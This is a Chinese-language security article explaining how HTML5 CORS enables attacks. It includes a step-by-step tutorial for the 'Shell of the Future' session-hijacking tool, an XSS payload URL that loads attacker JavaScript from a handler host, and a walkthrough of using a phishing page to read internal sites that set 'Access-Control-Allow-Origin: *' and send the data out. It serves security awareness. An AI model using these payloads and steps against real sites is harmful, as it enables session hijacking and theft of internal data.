揭密HTML 5带来的攻击手法

HTML5 是下一代的HTML，HTML5赋予网页更好的意义和结构。更加丰富的标签将随着对RDFa的，微数据与微格式等方面的支持，构建对程序、对用户都更有价值的数据驱动的Web。基于HTML5开发的网页APP拥有更短的启动时间，更快的联网速度。本文详细介绍了HTML5的普及，带来的新的安全威胁。

CORS(Cross-Origin Resource Sharing) 跨域资源共享

为了构建高品质的网站，以及满足日益增长的用户需求，HTML5针对SOP(同源策略)放宽了一些限制，简单的说，同源策略允许来自同一站点的页面访问其页面的方法和属性等，但限制了跨域调用其他页面的方法和属性。现在HTML5放宽了这些限制，XMLHttpRequest Level 2新增了功能CORS协议，允许Ajax发起跨域的请求，浏览器是可以发起跨域请求的，比如你可以外链一个外域的图片或者脚本。但是Javascript脚本是不能获取这些资源的内容的，它只能被浏览器执行或渲染。

COR是页面层次的控制模式。每一个页面需要返回一个名为‘Access-Control-Allow-Origin’的HTTP头来允许外域的站点访问。你可以仅仅暴露有限的资源和有限的外域站点访问。在COR模式中，访问控制的职责可以放到页面开发者的手中，而不是服务器管理员。当然页面开发者需要写专门的处理代码来允许被外域访问。

所以只要b.com允许，a.com可以使用ajax获取A上任意数据，国外安全研究者Lava Kumar开发了一款工具“Shell of the future”。

Shell of the Future 是一个反向Web Shell处理工具(Reverse Web Shell handler)。利用跨站脚本攻击或浏览器地址栏注入javascript以后，Shell of the Future可进行劫持会话。 它利用了HTML5支持的Cross Origin Requests，可以绕过一些反会话劫持的方法，如HTTP-Only限制的cookie，帮定IP地址的会话ID。

如何使用该工具：

1、下载并解压该工具，双击“Shell of the Future.exe”，会弹出一个窗口。

2、输入任意端口，点击“Start”。

3、使用浏览器访问http://127.0.0.1:8008/sotf.console (firefox效果最佳)

4、不出问题，你将看到以下画面。(Shell of the Future有两个JavaScript的exp- e1.js和e2.js，我们可以利用XSS漏洞将其嵌入到受害者的浏览器)

5、当一个用户登录下面的测试网站：

http://www.testfire.net/bank/login.aspx (admin/admin)

该站点的搜索功能粗在一个XSS漏洞

http://www.testfire.net/search.aspx?txtSearch=%3Cscript%3Ealert%2812%29%3C%2Fscript%3E

6、攻击者发送一个恶意链接给用户，如下：

http://www.testfire.net/search.aspx?txtSearch=%3Cscript%20src=%22http://127.0.0.1:8008/e1.js%22%3E%3C/script%3E

7、当用户点击之后，攻击者的IP地址将会发送给攻击者，然后点击“Hijack Session”：

8、点击Hijack Session之后，将出现如下画面：

访问内部服务器：

很多互联网公司除了有ONLINE对外的业务之外，在内部也用着很多的应用，如财务管理系统、员工管理系统以及其他的一些内部社区等，很多开发者为了各个应用之间调用简洁方便，在很多应用中都添加了以下头：

Control-Allow-Origin: *

攻击者可以利用社会工程学，让内部用户点击一个链接，然后攻击者就可以访问到内部的一些资源，以下为操作步骤：

1、员工登录到内部的某应用，如www.internalurl.com

2、internalurl服务器返回的响应头设置了Access-Control-Allow-Origin: *(允许任何域发起的请求都可以获取当前服务器的数据。)

3、员工受到一封邮件，点击了链接 – www.malicioussite.com

4、这个站点包含了正常的UI内容，所以员工一般不会察觉，但是，该页面包含了一段javascript代码。

5、该javascript代码会发送一个XMLHttpRequest请求。

6、分析返回的数据包，并把它发送到攻击者的服务器。

7、攻击者获取到公司内部站点的相关信息。